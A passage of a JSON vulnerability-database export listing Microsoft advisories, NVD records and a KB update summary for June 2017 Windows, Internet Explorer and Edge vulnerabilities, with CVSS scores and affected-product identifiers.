"integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8493"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8493", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8493", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. 
An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then inject malicious code into a script that is trusted by the Code Integrity policy. The injected code would then run with the same trust level as the script and bypass the Code Integrity policy.\n\nThe update addresses the vulnerability by correcting how PowerShell exposes functions and processes user supplied code.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0173", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0173", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0173", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An 
elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8465", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8465", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8465", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists in Microsoft Windows if a user opens a specially crafted .pdf file. An attacker who successfully exploited the vulnerability could cause arbitrary code to execute in the context of the current user.\n\nIf a user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThe update addresses the vulnerability by modifying how Windows parses .pdf files.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows PDF Remote Code Execution", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0291", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0291", "href": 
"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0291", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8469", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8469", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8469", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": 
"2022-10-18T20:21:09", "description": "A denial of service vulnerability exists in Microsoft Windows when an unauthenticated attacker sends a specially crafted kernel mode request.\n\nAn attacker who successfully exploited this vulnerability could cause a denial of service on the target system, causing the machine to either stop responding or reboot.\n\nThe security update addresses the vulnerability by changing how Windows handles certain types of kernel mode requests.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows VAD Cloning Denial of Service Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8515", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8515", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8515", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8533", "CVE-2017-8529"], "modified": "2019-06-11T07:00:00", "id": "MS:CVE-2017-8533", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8533", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure 
vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n\nThe update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0284", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0284", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0284", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects 
in memory.\n\nTo exploit this vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8489", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8489", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8489", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-10-18T16:36:41", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, and Windows Server 2012 and R2 allow an attacker to detect specific files on the user's computer when affected Microsoft scripting engines do not properly 
handle objects in memory, aka \"Microsoft Browser Information Disclosure Vulnerability\".", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8529", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529"], "modified": "2022-10-18T14:58:00", "cpe": ["cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:edge:-", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-8529", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8529", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:48:33", "description": "Microsoft Edge in Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user when the Edge JavaScript scripting engine fails to handle objects in memory, aka \"Scripting Engine Memory 
Corruption Vulnerability\". This CVE ID is unique from CVE-2017-8520, CVE-2017-8521, CVE-2017-8548, and CVE-2017-8549.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8499", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8549"], "modified": "2019-03-15T13:38:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-8499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8499", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:48:52", "description": "Microsoft Edge in Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user when the Edge JavaScript scripting engine fails to handle objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-8499, CVE-2017-8520, CVE-2017-8548, and CVE-2017-8549.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8521", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8549"], "modified": "2017-06-21T15:18:00", "cpe": ["cpe:/a:microsoft:edge:*"], "id": "CVE-2017-8521", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8521", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:48:51", "description": "Microsoft Edge in Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user when the Edge JavaScript scripting engine fails to handle objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-8499, CVE-2017-8521, CVE-2017-8548, and CVE-2017-8549.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8520", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8549"], "modified": "2019-03-19T19:58:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-8520", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8520", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:49:16", "description": "Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system when Microsoft Edge improperly handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-8499, CVE-2017-8520, CVE-2017-8521, and CVE-2017-8549.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8548", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8549"], "modified": "2019-03-19T18:35:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-8548", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8548", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:49:17", "description": "Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system when Microsoft Edge improperly handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-8499, CVE-2017-8520, CVE-2017-8521, and CVE-2017-8548.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8549", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8549"], "modified": "2019-03-19T18:15:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-8549", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8549", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}], "mskb": [{"lastseen": "2022-11-10T10:20:14", "description": "None\n## Summary\n\nThis security update resolves several reported vulnerabilities in Internet Explorer. The most severe of these vulnerabilities could allow remote code execution if a user views a specially crafted webpage in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-US/security-guidance/>). 
Additionally, see the following articles for more information about this cumulative update:\n\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/en-us/help/4009469/windows-7-sp1-windows-server-2008-r2-sp1-update-history>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/en-us/help/4009471/windows-server-2012-update-history>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/en-us/help/4009470/windows-8-1-windows-server-2012-r2-update-history>)\n * [Windows 10 and Windows Server 2016 update history](<https://support.microsoft.com/en-us/help/4000825/windows-10-and-windows-server-2016-update-history>)\n**Important**\n\n * The fixes that are included in this Security Update for Internet Explorer 4036586 are also included in the September 2017 Security Monthly Quality Rollup. Installing either the Security Update for Internet Explorer or the Security Monthly Quality Rollup installs the fixes that are resolved in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security updates classifications for deployment, this Security Update for Internet Explorer 4036586, the September 2017 Security Only Quality Update, and the September 2017 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * This Security Update for Internet Explorer is not applicable for installation on a computer where the Security Monthly Quality Rollup or the Preview of Monthly Quality Rollup from September 2017 (or a later month) is already installed. This is because those updates contain all fixes that are in this Security Update for Internet Explorer.\nIf you install a language pack after you install this update, you must reinstall this update. 
